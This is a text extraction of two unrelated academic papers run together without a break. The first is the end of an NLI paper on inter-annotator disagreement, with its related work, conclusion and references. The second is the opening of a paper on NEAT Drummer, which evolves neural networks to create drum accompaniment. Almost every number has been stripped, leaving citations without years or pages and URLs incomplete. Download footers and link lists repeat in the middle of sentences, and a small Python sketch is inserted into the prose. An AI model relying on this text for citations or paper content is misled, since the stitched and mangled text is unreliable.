architectures and/or training objectives that enable models to learn a notion of uncertainty that is consistent with the full range of possible human inferences, despite observing labels from only one or a few people on any given p/h pair. overcoming these challenges, and moving towards models which can both understand sources of linguistic uncertainty and anticipate the range of ways that people might resolve it would be exciting both for nli and for representation learning in general. related work defining entailment and nli. as outlined in section , there has been substantive discussion about the definition of the nli task. this debate can largely be reduced to a debate about sentence meaning versus speaker meaning. the former aligns more closely with the goals of formal semantics and seeks a definition of the nli task that precisely circumscribes the ways in which vague notions of ‘‘world knowledge’’ and ‘‘com- mon sense’’ can factor into inference (zaenen et al., ). 
the latter takes the perspective that the nli task should maintain an informal defi- nition in which p → h as long as h is some- thing that a human would be ‘‘happy to infer’’ from p, where the humans making the inferences are assumed to be ‘‘awake, careful, moderately intelligent and informed . . . but not . . . seman- ticists or similar academics’’ (manning, ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://www.clsp.jhu.edu/workshops/ -workshop/general-purpose-sentence-representation-learning/ https://www.clsp.jhu.edu/workshops/ -workshop/general-purpose-sentence-representation-learning/ https://www.clsp.jhu.edu/workshops/ -workshop/general-purpose-sentence-representation-learning/ https://repeval .github.io garoufi ( ) provides an overview of attempts that have been made to circumscribe the annota- tion process by providing finer-grained annota- tion options, in order to bring it more in line with the sentence-meaning task definition. westera and boleda ( ), in the context of advocating for distributional models of semantics in general, makes a case in favor of the speaker-meaning ap- proach, arguing that issues like entailment, refer- ence, and truth conditions should not fall within the purview of sentence meaning at all, despite being quintessential topics of formal semantic study. chatzikyriakidis et al. ( ) overview nli datasets, observing that datasets tend to be designed with one of these perspectives in mind, and thus all datasets ‘‘fail to capture the wealth of inferential mechanisms present in nli and seem to be driven by the dominant discourse in the field at the time of their creation.’’ an orthogonal line of discussion about the definition of entailment focuses on the question of whether truth-conditional semantics should be strictly binary (propositions are either true or false) or rather treated as continuous/probabilistic val- ues. currently, at least within computationally minded work on textual inference, the prevailing opinion is in favor of the latter (i.e., allowing semantic judgments to be probabilistic) with few (if any) advocating that we should build systems that only support discrete true/false decisions. still, significant theoretical and algorithmic work has gone into making probabilistic logics work in practice. such work includes (controversial) for- malisms such as fuzzy set theory (zadeh, , ), as well as more generally accepted formal- isms which assume access to boolean ground- ings, such as probabilistic soft logic (friedman et al., ; kimmig et al., ; beltagy et al., ) and markov logic networks (richardson and domingos, ). also related is work on collecting and analyzing graded entailment judg- ments (de marneffe et al., ). we note that the question of strict vs. graded entailment judg- ments pertains to modeling of uncertainty within an individual rater’s judgments. this is indepen- dent of the question of if/how to model disagree- ments between raters, which is the our focus in this work. embracing rater disagreement. significant past work has looked an annotator disagreement in linguistic annotations, and has advocated that this disagreement should be taken as signal rather than noise (aroyo et al., ; palomaki et al., ). plank et al. ( ) showed that incorporating rater uncertainty into the loss function for a pos tagger improves downstream performance. similar approaches have been applied in parsing (martı́nez alonso et al., ) and supersense tagging (martı́nez alonso et al., ). 
specif- ically relevant to this work is past discussion of disagreement on semantic annotation tasks, in- cluding anaphora resolution (poesio and artstein, ), coreference (versley, ; recasens et al., ), word sense disambiguation (erk and mccarthy, ; passonneau et al., ; jurgens, ), veridicality (geis and zwicky, ; karttunen et al., ; de marneffe et al., ), semantic frames (dumitrache et al., ), and grounding (reidsma and op den akker, ). most of this work focuses on the uncertainty of individual raters, oftentimes concluding that such uncertainty can be addressed by shifting to a graded rather than discrete labeling schema and/or that uncertainty can be leveraged as a means for detecting inherently ambiguous items. in contrast, we do not look at measures of uncertainty/ambiguity from the point of view of an individual (though this is a very interest- ing question); rather, we focus on disagreements that exist between raters. we agree strongly that semantic judgments should be treated as graded, and that ambiguous items should be acknowl- edged as such. still, this is independent of the issue of inter-rater disagreement: two raters can disagree when making graded judgments as much as they can when making discrete judgments, and they can disagree when they are both uncertain as much as they can when they are both certain. thus, the central question of this work is whether aggre- gation (via average or majority vote) is a faith- ful representation of the underlying distribution of judgments across annotators. arguably, such aggregation is a faithful (albeit lossy) representa- tion of high-variance unimodal distributions, but not of multi-modal ones. in this regard, particularly relevant to our work is de marneffe et al. ( ) and de marneffe et al. ( ), who observed similarly persistent disagreement in graded judgments of veridicality, and made a case for attempting to model the full distribution as opposed to a single aggregate score. smith et al. ( ) present related theoretical work, which proposes specific mechanisms by downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april which humans might handle lexical uncertainty in the context of inference. their model assumes pragmatic speakers and listeners who reason simultaneously about one another’s goals and about the lexicon itself, and could be used to explain differing inferences in cases where raters share different beliefs about the speaker (author) of p and/or about the lexicon. schaekermann et al. ( ) develop a proof-of-concept annotation in- terface specifically intended to recognize whether or not inter-rater disagreement is ‘‘resolvable’’ via more annotation, or rather is likely to persist, although they don’t discuss natural language semantics directly. finally, tanenhaus et al. ( ) discuss the role of formal semantics and generative grammar in inference, and specifically differentiates between work which treats grammar as a causal process of how inferences occur versus work which treats grammar as a descriptive framework of the structure of language. such dis- cussion is relevant going forward, as engineers of nli systems must determine both how to define the evaluation task, as well as the role that concepts from formal semantics should play within such systems. conclusion we provide an in-depth study of disagreements in human judgments on the nli task. 
we show that many disagreements persist even after increasing the number of annotators and the amount of context provided, and that models which represent these annotations as multimodal distributions gen- eralize better to held-out data than those which do not. we evaluate whether a state-of-the-art nli model (bert) captures these disagreements by virtue of producing softmax distributions over labels and show that it does not. we argue that, if nli is to serve as an adequate intrinsic evaluation of semantic representations, then models should be evaluated in terms of their ability to predict the full expected distribution over all human raters, rather than a single aggregate score. acknowledgments thank you to the action editor chris potts and the anonymous reviewers for their input on earlier drafts of this paper. this work evolved substantially as a result of their suggestions and feedback. thank you to dipanjan das, michael collins, sam bowman, ankur parikh, emily pitler, yuan zhang, and the rest of the google language team for many useful discussions. references lora aroyo, anca dumitrache, praveen paritosh, alex quinn, and chris welty, editors. . proc. subjectivity, ambiguity and disagree- ment in crowdsourcing (sad), volume of . hcomp, zurich, switzerland. islam beltagy, katrin erk, and raymond mooney. . probabilistic soft logic for semantic tex- tual similarity. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, md. association for computational linguistics. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural lan- guage inference. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , lisbon, portugal. association for computa- tional linguistics. razvan bunescu. . learning with probabilis- tic features for improved pipeline models. in proceedings of the conference on empir- ical methods in natural language processing, pages – , honolulu, hi. association for computational linguistics. chris callison-burch and mark dredze. . creating speech and language data with amazon’s mechanical turk. in proceedings of the naacl hlt workshop on creating speech and language data with amazon’s me- chanical turk, pages – , los angeles, ca. association for computational linguistics. stergios chatzikyriakidis, robin cooper, simon dobnik, and staffan larsson. . an over- view of natural language inference data col- lection: the way forward? in proceedings of the computing natural language inference workshop. timothy chklovski and patrick pantel. . verbocean: mining the web for fine-grained semantic verb relations. in proceedings of downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the conference on empirical methods in natural language processing, pages – , barcelona, spain. association for computa- tional linguistics. robin cooper, dick crouch, jan van eijck, chris fox, johan van genabith, jan jaspars, hans kamp, david milward, manfred pinkal, massimo poesio, and steve pullman. , using the framework. technical report, technical report lre - d- , the fracas consortium. ido dagan, oren glickman, and bernardo magnini. , the pascal recognising tex- tual entailment challenge. in machine learning challenges. evaluating predictive uncertainty, visual object classification, and recognising textual entailment, pages – . 
springer ishita dasgupta, demi guo, andreas stuhlmüller, samuel j. gershman, and noah d. goodman. . evaluating compositionality in sentence embeddings. arxiv preprint arxiv: . . jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre- training of deep bidirectional transformers for language understanding. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technolo- gies, volume (long and short papers), pages – , minneapolis, mn. associ- ation for computational linguistics. anca dumitrache, lora aroyo, and chris welty. . a crowdsourced frame disambiguation corpus with ambiguity. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – , minneapolis, mn. association for com- putational linguistics. anca dumitrache, lora aroyo, christopher a. welty, robert-jan sips, and anthony levas. . dr. detective: combining gamification techniques and crowdsourcing to create a gold standard for the medical domain. in crowdsem workshop at the international semantic web conference. katrin erk and diana mccarthy. . graded word sense assignment. in proceedings of the conference on empirical methods in natural language processing, pages – , singapore. association for computational linguistics. allyson ettinger, ahmed elgohary, colin phillips, and philip resnik. . assessing composition in sentence vector representations. in proceedings of the th international conference on computational linguistics, pages – , santa fe, nm. association for computational linguistics. christiane fellbaum. . wordnet, wiley online library. jenny rose finkel, christopher d. manning, and andrew y. ng. . solving the problem of cascading errors: approximate bayesian inference for linguistic annotation pipelines. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – , sydney, australia. association for computational linguistics. nir friedman, lise getoor, daphne koller, and avi pfeffer. . learning probabilistic relational models. in ijcai, : – . konstantina garoufi. . towards a better understanding of applied textual entailment. ph.d. thesis, citeseer. michael l. geis and arnold m. zwicky. . on invited inferences. linguistic inquiry, ( ): – . marti a. hearst. . automatic acquisition of hyponyms from large text corpora. in coling volume : the th international con- ference on computational linguistics. rafal józefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. arxiv, abs/ . . david jurgens. . embracing ambiguity: a comparison of annotation methodologies for crowdsourcing word sense labels. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , atlanta, ga. association for computational linguistics. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april lauri karttunen, stanley peters, annie zaenen, and cleo condoravdi. . the chameleon- like nature of evaluative adjectives. empirical issues in syntax and semantics, : – . angelika kimmig, stephen bach, matthias broecheler, bert huang, and lise getoor. . a short introduction to probabilistic soft logic. in proceedings of the nips workshop on probabilistic programming: foundations and applications, pages – . 
volodymyr kuleshov and percy s. liang. . calibrated structured prediction. in advances in neural information processing systems, pages – . christopher d. manning. . local textual inference: its hard to circumscribe, but you know it when you see it–and nlp needs it. https://nlp.stanford.edu/manning/papers/textual inference.pdf marie-catherine de marneffe, mandy simons, and judith tonhauser. . factivity in doubt: clause-embedding predicates in naturally occurring discourse. sinn und bedeutung (poster). marie-catherine de marneffe, christopher d. manning, and christopher potts. . did it happen? the pragmatic complexity of verid- icality assessment. computational linguistics, ( ): – . héctor martı́nez alonso, anders johannsen, and barbara plank. . supersense tagging with inter-annotator disagreement. in proceedings of the th linguistic annotation workshop held in conjunction with acl (law-x ), pages – , berlin, germany. association for computational linguistics. héctor martı́nez alonso, barbara plank, arne skjærholt, and anders søgaard. . learning to parse with iaa-weighted loss. in proceed- ings of the conference of the north american chapter of the association for com- putational linguistics: human language tech- nologies, pages – , denver, co. association for computational linguistics. tom mccoy, ellie pavlick, and tal linzen. . right for the wrong reasons: diagnosing syn- tactic heuristics in natural language inference. in proceedings of the th annual meeting of the association for computational lin- guistics, pages – , florence, italy. association for computational linguistics. richard montague. . universal grammar. theoria, ( ): – . jennimaria palomaki, olivia rhinehart, and michael tseng. . a case for a range of acceptable annotations. in proceedings of workshop on subjectivity, ambiguity, and disagreement (sad). hcomp. rebecca j. passonneau, vikas bhardwaj, ansaf salleb-aouissi, and nancy ide. . multi- plicity and word sense: evaluating and learning from multiply labeled word sense annota- tions. language resources and evaluation, ( ): – . ellie pavlick and chris callison-burch. a. most ‘‘babies’’ are ‘‘little’’ and most ‘‘prob- lems’’ are ‘‘huge’’: compositional entailment in adjective-nouns. in proceedings of the th annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , berlin, germany. associa- tion for computational linguistics. ellie pavlick and chris callison-burch. b. so-called non-subsective adjectives. in pro- ceedings of the fifth joint conference on lexical and computational semantics, pages – , berlin, germany. association for computational linguistics. barbara plank, dirk hovy, and anders søgaard. . learning part-of-speech taggers with inter-annotator agreement loss. in proceedings of the th conference of the european chapter of the association for computational lin- guistics, pages – , gothenburg, sweden. association for computational linguistics. massimo poesio and ron artstein. . the reli- ability of anaphoric annotation, reconsidered: taking ambiguity into account. in proceed- ings of the workshop on frontiers in corpus annotations ii: pie in the sky, pages – , ann arbor, mi. association for computational linguistics. massimo poesio, jon chamberlain, silviu paun, juntao yu, alexandra uma, and udo kruschwitz. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april . a crowdsourced corpus of multiple judg- ments and disagreement on anaphoric interpre- tation. 
in proceedings of the conference of the north american chapter of the association for computational linguistics: human lan- guage technologies, volume (long and short papers), pages – , minneapolis, mn. association for computational linguistics. adam poliak, yonatan belinkov, james glass, and benjamin van durme. a. on the evaluation of semantic phenomena in neural machine translation using natural language inference. in proceedings of the conference of the north american chapter of the association for computational linguistics: human lan- guage technologies, volume (short papers), pages – , new orleans, la. association for computational linguistics. adam poliak, aparajita haldar, rachel rudinger, j. edward hu, ellie pavlick, aaron steven white, and benjamin van durme. b. collecting diverse natural language inference problems for sentence representation evalua- tion. in proceedings of the conference on empirical methods in natural language processing, pages – , brussels, belgium. association for computational linguistics. marta recasens, eduard hovy, and m. antònia martı́. . identity, non-identity, and near- identity: addressing the complexity of coref- erence. lingua, ( ): – . dennis reidsma and rieks op den akker. . exploiting ‘subjective’ annotations. in coling : proceedings of the workshop on hu- man judgements in computational linguistics, pages – , manchester, uk. coling organizing committee. matthew richardson and pedro domingos. . markov logic networks. machine learning, ( – ): – . mike schaekermann, edith law, alex c. williams, and william callaghan. . re- solvable vs. irresolvable ambiguity: a new hybrid framework for dealing with uncertain ground truth. in st workshop on human- centered machine learning at sigchi. mandy simons, judith tonhauser, david beaver, and craige roberts. . what projects and why. semantics and linguistic theory, : – . nathaniel j. smith, noah goodman, and michael frank. . learning and using language via recursive pragmatic reasoning about other agents. in advances in neural information processing systems, pages – . rion snow, brendan o’connor, daniel jurafsky, and andrew ng. . cheap and fast—but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of the conference on empirical methods in natural language processing, pages – , honolulu, hi. association for computational linguistics. m. tanenhaus, g. carlson, and m. s. seidenberg. . do listeners compute linguistic repre- sentations? d. dowty, l. karttunen, and a. zwicky, editors, natural language parsing. cambridge university press. judith tonhauser, david i. beaver, and judith degen. . how projective is projective con- tent? gradience in projectivity and at-issueness. journal of semantics, ( ): – . y. versley. . vagueness and referential ambiguity in a large-scale annotated corpus. re- search on language and computation, : – . matthijs westera and gemma boleda. . don’t blame distributional semantics if it can’t do entailment. in proceedings of the th international conference on computational semantics - long papers, pages – , gothenburg, sweden. association for com- putational linguistics. aaron s. white, valentine hacquard, and jeffrey lidz. . semantic information and the syntax of propositional attitude verbs. cognitive science, ( ): – . aaron steven white, pushpendre rastogi, kevin duh, and benjamin van durme. . in- ference is everything: recasting semantic resources into a unified evaluation framework. 
in proceedings of the eighth international joint conference on natural language processing (volume : long papers), pages – , downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april taipei, taiwan. asian federation of natural language processing. aaron steven white and kyle rawlins. . the role of veridicality and factivity in clause selection. th annual meeting of the north east linguistic society, reykjavı́k. http:// iceland .nelsconference.org/wp-content/ uploads/ / /white-rawlins.pdf. adina williams, nikita nangia, and samuel bowman. . a broad-coverage challenge corpus for sentence understanding through inference. in proceedings of the con- ference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, la. association for computational linguistics. lotfi a. zadeh. . fuzzy logic, neural net- works, and soft computing. communications of the acm, ( ): – . lotfi a. zadeh. . fuzzy logic = computing with words. ieee transactions on fuzzy sys- tems, ( ): – . bianca zadrozny and charles elkan. . transforming classifier scores into accurate multiclass probability estimates. in proceedings of the eighth acm sigkdd international conference on knowledge discovery and data mining, pages – . acm. annie zaenen, lauri karttunen, and richard crouch. . local textual inference: can it be defined or circumscribed? in proceedings of the acl workshop on empirical modeling of semantic equivalence and entailment, pages – , ann arbor, mi. association for computational linguistics. sheng zhang, rachel rudinger, kevin duh, and benjamin van durme. . ordinal common-sense inference. transactions of the association for computational linguistics, : – . https://www.aclweb.org/anthology/ q - . doi: . /tac a . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://iceland .nelsconference.org/wp-content/uploads/ / /white-rawlins.pdf http://iceland .nelsconference.org/wp-content/uploads/ / /white-rawlins.pdf http://iceland .nelsconference.org/wp-content/uploads/ / /white-rawlins.pdf https://www.aclweb.org/anthology/q - https://www.aclweb.org/anthology/q - introduction the rte/nli task nli data and annotation sentence pairs annotation preprocessing analysis of human judgments experimental design results analysis of model predictions motivation experimental design results discussion related work conclusion exploiting functional relationships in musical composition amy k. hoover and kenneth o. stanley evolutionary complexity research group school of electrical engineering and computer science university of central florida orlando, fl - usa {ahoover, kstanley}@eecs.ucf.edu http://eplex.cs.ucf.edu/neatmusic to appear in: connection science special issue on music, brain, & cognition, abington, uk: taylor & francis, : , - , june . abstract the ability of gifted composers such as mozart to create complex mul- tipart musical compositions with relative ease suggests a highly efficient mechanism for generating multiple parts simultaneously. computational models of human music composition can potentially shed light on how such rapid creativity is possible. this paper proposes such a model based on the idea that the multiple threads of a song are temporal patterns that are functionally related, which means that one instrument’s sequence is a function of another’s. 
this idea is implemented in a program called neat drummer that interactively evolves a type of artificial neural net- work (ann) called a compositional pattern producing network (cppn), which represents the functional relationship between the instruments and drums. the main result is that richly textured drum tracks that tightly follow the structure of the original song are easily generated because of their functional relationship to it. keywords: compositional pattern producing networks; cppns; computer- generated music; interactive evolutionary computation; iec; neuroevo- lution of augmenting topologies introduction a most intriguing capability of human composers is that they can often quickly conceive multiple instrumental parts simultaneously during the creative process. for example, mozart could hear complex multipart pieces form “in his head,” suggesting a powerful creative mechanism for generating accompaniment (rup- pel, ; deutsch, ; hymer, ). relatedly, rock guitarists in jam ses- sions and jazz musicians can improvise together while simultaneously perfectly respecting the interdependencies of their separate parts (barrett, ; berliner, ; katz and longden, ; oliver, ; schuller, ; weick, ). thus although intuition may suggest that complex interdependent construc- tions should require care and labor to devise, in fact such constructions in music appear almost effortless. thus it is likely that no explicit serial reasoning is in- volved in the creative construction of accompanying instrumental tracks. what kind of mechanism then is responsible for such a capability? this paper suggests a possible high-level answer to this question. the key idea is that different instrumental parts are functionally related, which means that one can be expressed as a function of another. furthermore, although we may perceive the interplay between two or more simultaneous instruments as rich and complex, in fact the function that relates one to the other can be quite simple. thus, in this view, once a single track such as a melody is created, it can serve as a scaffold, i.e. an existing support structure, upon which other tracks are generated. in this way, while composers may seem to improvise entire harmonies and drum tracks one note at a time, fundamentally they need only construct a simple function for each part that transforms the scaffold. in fact, because the scaffold already in effect embodies the intrinsic con- tours and complexities of the song, any transformation of the scaffold inherits these features and thereby embodies the same thematic elements automatically. thus the space of possible transforming functions is highly forgiving, in part explaining why improvising accompaniment can appear effortless. as long as the accompaniment is expressed as a function of the scaffold, it is difficult to go significantly wrong. while this idea of functions relating one pattern to another is difficult (though not necessarily impossible) to confirm at a neurological level, it does suggest a promising model for computer-generated music. this paper describes the implementation of such a model and presents its results. the goal is to gen- erate drum tracks to accompany existing songs. because rhythm is simpler than melody or harmony, rhythm generation is an appealing stepping stone to full blown harmonization. it effectively highlights the advantages of the functional perspective in clear and simple terms that do not require musical expertise to appreciate. 
formally, an appealing drum pattern for a particular piece over time can be described as a function of time, f (t). however, a good pattern for a particular drum may be highly complex with respect to t, making its discovery prohibitive. yet given an existing part p(t) (i.e. the scaffold) that varies over time, it is likely significantly easier to discover the pattern g(p(t)) rather than f (t) even though they produce the same pattern. in effect, p makes discovering the accompanying pattern easy because it provides the scaffold, thereby allowing the composer to focus only on devising the much simpler g(p(t)). this idea is implemented in this paper in a program called neat drummer, which automatically generates drum tracks for existing songs. it accepts existing human compositions as input to a type of artificial neural network (ann) called a compositional pattern producing network (cppn; stanley ) and outputs drum patterns to accompany the instruments. the inputs to neat drummer are specific parts of a musical instrument digital interface (midi) file (e.g. the lead guitar, bass guitar, and vocals) and the outputs are drum tracks that are played along with the original midi file. that way, outputs are a function of the original midi file inputs, forcing synchronization with the midi. to take into account the user’s own inclinations, neat drummer allows the user to interactively evolve rhythms from an initial population of drum tracks with the neuroevolution of augmenting topologies (neat) algorithm (stanley and miikkulainen, , ), which can evolve increasingly complex cppn-encoded patterns. the main results are drum tracks for existing songs that tightly follow the contours and idiosyncrasies of individual pieces, yet elaborate and elucidate them in creative and unexpected ways. even when major transitions occur, because the drum tracks are a function of the music, the drums perfectly follow the transitions. this functional model of musical composition is then further extended to allow human users to add their own functional influences to create variational motifs outside the confines of the provided song. for example, users can provide a monotonically increasing function (i.e. time), which suggests change over time even if the underlying scaffold is repetitive. the result is that the drum track can be made to vary exactly as the user requests, while still seamlessly interweaving with the song. these user-provided functions are called conductors in a loose analogy with orchestral conductors, who describe functional contours with their hands that the orchestra follows. the conductors further highlight the simplicity and relative ease of creating subtle overlapping textures through simple functional relationships. to highlight the importance of scaffolding and conductors, several variants of neat drummer without such facilities are compared with neat drummer with its full functionality intact. the result is that the consequent capabilities are significantly impoverished, demonstrating the critical role that scaffolding plays in generating accompaniment. while the main contribution is a powerful new approach to computer-aided musical creativity, the high-level implication for improvisational accompaniment provides an intriguing clue to how such mechanisms may work in the brain. the next section provides background for the approach introduced in this paper. this approach is then described in section and the experimental design is explained in section . 
results are disclosed in sections and , and discussed in section . background this section first explains interactive evolutionary computation (iec), which is part of the neat drummer approach, and its application to computer- generated music. the section concludes with a review of the neat method. . interactive evolutionary computation neat drummer refines its original drum patterns through a process called interactive evolutionary computation (iec), which means a human, rather than a predefined fitness function, selects the parents of the next generation (takagi, ). iec implementations typically generate a random initial population. the user then selects the most fit individuals from that population to reproduce, resulting in increasingly complex individuals. iec addresses the problem that objective evaluation is difficult in aesthetic or subjective domains such as art and music. by shifting the burden of evalua- tion to the human, the need to formalize subjective quality is avoided. richard dawkins first popularized iec with biomorphs, a visual representation of arti- ficial organisms designed to illustrate evolutionary principles (dawkins, ). biomorphs inspired a proliferation of programs tackling design problems from tool creation (sato and hagiwara, ) and suspension bridges (furuta et al., ) to education, teaching, and story composition (kuriyama and terano, ). because it can harness subjective preferences, a major application of iec is art. the power of this approach is evident in visual domains like the l- system-encoded mutator (lindenmayer, ; todd and latham, ), karl sims’ genetic art (sims, ), and picbreeder (secretan et al., ), a website where users evolve, save, and publish images. picbreeder evolves its images with neat (section . ), the same evolutionary algorithm used by neat drummer. iec has also branched into musical evolution, such as the biomorphs-inspired sonomorphs (nelson, ).the next section reviews several such approaches to computer-generated music, which are often based on iec. . evolutionary computer generated music the idea that computers might be able to compose music has inspired a diversity of approaches. while this section focuses mainly on evolutionary approaches, a broad review of the area can be found in de mantaras and arcos ( ). often computer generated music utilizes iec to leverage the subjective capabilities of average human subjects while avoiding the need for musical expertise. for example, among the first iec music applications is sonomorphs (nelson, ), which encodes rhythms as bit strings in which a note is either on or off. direct representation of this type, wherein each note is represented by a single gene, does not attempt to model how humans encode music neurologically. however, the creative evolutionary process is a metaphor for human composition through variation and refinement. listeners often feel that computer-generated music sounds artificial and uninspired. music generators tend to either evolve a solution to fit a partic- ular a priori style or improvise pieces that often lack a global structure that holds together the entire song (mccormack, ; husbands et al., ). it is common for music generators, such as sonomorphs, conga (tokui and iba, ), gp-music system (johanson and poli, ), and the ga- based iec composition system of onisawa et al. (onisawa et al., ) to focus on composing short phrases rather than on entire songs (nelson, ; biles, ). 
these short phrases, which are selected and evolved by the user, may be extended through looping or manual juxtaposition, but the overall structure of the song is not itself generated. a notable example of computational improvisation is genjam (biles, ), which composes music in the style of jazz in cooperation with a human musi- cian. genjam listens to human improvisations and interprets and genetically modifies the notes. genjam can also evolve a soloist that is independent of any particular jazz composition by first training from human input. it integrates its improvisations seamlessly into a musical stream by prescripting when in the song improvisation may occur. in this way, it preserves the overall musical structure provided by the human, although it does not innovate at the level of global structure on its own. early connectionist approaches, which also emphasize short phrases, repre- sent change over time through recurrence (todd and loy, ). recurrence means that a network can represent a time series through a pattern of cycling activation. todd and loy (todd and loy, ) first applied recurrent anns to music generation by training them to reproduce patterns with real-time recurrent learning (rtrl). chen and miikkulainen (chen and miikkulainen, ) later combined this recurrent learning approach with evolution based on the idea that a simple recurrent network (srn) can capture a general style of music and then vary it through evolution. this approach succeeded in produc- ing melodies in the style of bela bartok on a local level; however, even with recurrence it is difficult to capture global structure. neat drummer approaches the problem of global structure by generating its rhythms from already-existing instrumental parts that span entire songs, thereby diminishing the need to represent patterns over time through recurrence. the next section describes the neat method that implements evolution in neat drummer. . neuroevolution of augmenting topologies (neat) and cppns neat drummer follows the idea in prior connectionist approaches that an ann can effectively represent music. therefore, a method is needed to allow the user to evolve anns. the neat method, described in this section, is chosen for this purpose in neat drummer because it allows anns to increase in complexity over generations. in particular, neat drummer evolves a neural- based encoding of drum patterns. the neat method was originally developed to solve difficult control and sequential decision tasks. the anns evolved with neat control agents that select actions based on their sensory inputs. while previous methods that evolved anns, i.e. neuroevolution methods, evolved either fixed topology net- works (gomez and miikkulainen, ; saravanan and fogel, ), or arbitrary random-topology networks (yao, ), neat is notable for beginning evolu- tion with a population of small, simple networks and complexifying the network topology over generations into diverse species, leading to increasingly sophisti- cated behavior. this section briefly reviews the neat method; stanley and miikkulainen ( , ) provide complete introductions. neat is based on three key principles. first, to allow ann structures to in- crease in complexity over generations, a method is needed to keep track of which gene is which; otherwise, it is not clear in later generations which individual is compatible with which, or how their genes should be combined to produce off- spring. 
neat solves this problem by assigning a unique historical marking to every new piece of network structure that appears through a structural muta- tion. the historical marking is a number assigned to each gene corresponding to its order of appearance over the course of evolution. the numbers are inherited during crossover unchanged, and allow neat to perform crossover without the need for expensive topological analysis. second, neat traditionally speciates the population based on topological similarity so that individuals compete primarily within their own niches instead of with the population at large, which protects topological innovations. the historical markings allow structures to be compared for this purpose. however, because the user performs selection in interactive evolution instead of the evo- lutionary algorithm itself, speciation is not applicable in neat drummer and therefore not utilized. note that in section , variants of regular non-interactive neat are compared to neat drummer, and these variants therefore do im- plement speciation. third, unlike other systems that evolve network topologies and weights (yao, ), neat begins with a population of simple networks with no hidden nodes. new structure is introduced incrementally as structural mutations occur, and only those structures survive that are found to be useful through fitness evalua- tions. this way, neat searches through a minimal number of weight dimensions and finds the appropriate complexity level for the problem. neat drummer lets the user evolve patterns of increasing complexity through this approach. finally, in neat drummer, neat evolves a kind of ann called a compo- sitional pattern producing network (cppn), which is designed to compactly represent patterns with regularities, such as pictures and songs (stanley, , ). what distinguishes cppns from anns is that in addition to traditional sigmoid functions, cppn hidden nodes can include several classes of functions, including periodic functions (like sine) for repetition and symmetric functions (like gaussian) for symmetry. an individual network can contain a heteroge- neous set of functions in its nodes, which are evolved along with the weights. to demonstrate the capabilities of such networks, stanley ( , ) showed how simple canonical functions can be composed to create an overall network figure : cppn inputs and outputs the user selects both a set of inputs from among the channels in the midi file and a set of outputs corresponding to specific drums. that produces patterns with complex regularities and symmetries. each com- ponent function creates a novel geometric coordinate frame within which other functions can reside. the idea in neat drummer is that this representation allows drum tracks with regular patterns to be discovered quickly and easily. the next section explains how cppns are evolved in neat drummer to produce rhythms. the neat drummer approach the main idea in neat drummer is that the temporal patterns of the instru- mental parts of a song can be inherited by the drums by making the drums a function of the other instruments. this section begins by explaining how cppns encode rhythm and then details how they are evolved interactively. . cppn rhythm generation neat drummer begins by generating an initial set of original drum tracks for a provided song. to initiate this first generation, the user must first specify the inputs and outputs of the cppn (figure ) through a graphical user interface (gui) provided by the program (figure ). 
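as a rough sense of what such a composition of heterogeneous functions looks like, the following minimal sketch (hypothetical; not the neat drummer code, with made-up weights) evaluates a tiny cppn-style network whose hidden nodes use sine and gaussian activations:

```python
# minimal sketch of a cppn-style computation (an illustration only): hidden
# nodes apply heterogeneous functions such as sine and gaussian, so the output
# composes their regularities (repetition and symmetry).
import math

def sigmoid(x):  return 1.0 / (1.0 + math.exp(-x))
def gaussian(x): return math.exp(-x * x)

def tiny_cppn(inputs, w):
    # two hidden nodes with different activation functions, one output;
    # the weights in w are hypothetical placeholders.
    h_sine  = math.sin(w[0] * inputs[0] + w[1] * inputs[1])
    h_gauss = gaussian(w[2] * inputs[0] + w[3] * inputs[1])
    return sigmoid(w[4] * h_sine + w[5] * h_gauss)

# sampling the network over "ticks" yields a pattern whose repetition comes
# from the periodic node and whose symmetry comes from the gaussian node.
w = [1.5, -0.7, 0.9, 0.4, 2.0, -1.2]
pattern = [tiny_cppn([t / 16.0, math.sin(t / 4.0)], w) for t in range(32)]
print([round(v, 2) for v in pattern[:8]])
```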
the inputs are individual instrumental tracks from the chosen song and the outputs are a set of drums that together produce the entire drum accompani- ment. from the inputs the cppn derives its original patterns, which are therefore functions of the original song (i.e. the scaffold) and its structure. in other words, neat drummer generates a rhythm that is a function of these inputs. thus, it is important to choose instruments that play salient motifs in the song so that the drum pattern can be derived from the richest structures available. further texture can be achieved by inputting more than one midi channel, e.g. bass and guitar. thus the user selects any combination of channels representing individual instrumental parts from a midi file to be input into the cppn. in this way, figure : neat drummer screenshot neat drummer presents an iec interface where visual representations of drum patterns help the user to de- cide whether to listen to each candidate and then select their favorites. this approach, i.e. choosing inputs and outputs and selecting favorites, is designed to allow users to evolve compelling drum tracks without the need for musical expertise. neat drummer generates rhythms from any midi file. the user also chooses the percussion instruments that will play the rhythm. each such instrument is represented by a single output on the cppn. for ex- ample, one output may be a bass drum, one a snare, and the final a hi-hat. any number of drums, and hence any number of outputs, are permissible. to produce the initial patterns, a set of random initial cppns with a min- imal initial topology (following the neat approach) and the chosen inputs and outputs are generated. the number of inputs in these initial topologies corresponds to the number of instrument channels in the scaffold (e.g. guitar, bass, etc.) plus a bias node. the relationship between the initial topology and the original song is thus established through these inputs, which feed informa- tion from the scaffold directly into the network. the number of outputs 